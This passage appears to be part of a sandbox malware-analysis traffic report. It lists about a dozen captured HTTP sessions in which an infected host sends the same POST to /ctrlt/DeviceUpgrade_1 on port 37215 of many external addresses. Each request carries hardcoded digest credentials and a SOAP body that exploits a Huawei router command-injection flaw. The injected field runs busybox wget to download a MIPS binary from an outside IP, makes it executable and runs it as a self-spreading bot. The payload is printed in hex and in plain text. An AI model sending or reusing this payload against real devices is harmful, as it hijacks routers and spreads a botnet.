70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          321192.168.2.1538678157.234.156.1037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.543168068 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          322192.168.2.155550682.118.91.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.543185949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          323192.168.2.156048654.48.61.22137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.543210030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          324192.168.2.1556928157.180.200.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.543231010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          325192.168.2.1558808157.220.169.14037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.543953896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          326192.168.2.1552388157.161.181.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.543988943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          327192.168.2.1541720197.211.8.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.544084072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          328192.168.2.1553926197.230.48.5737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.544183016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          329192.168.2.1555638197.64.208.6537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.544204950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          330192.168.2.1534080197.48.83.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.544275999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          331192.168.2.1544526169.208.16.19437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.544295073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
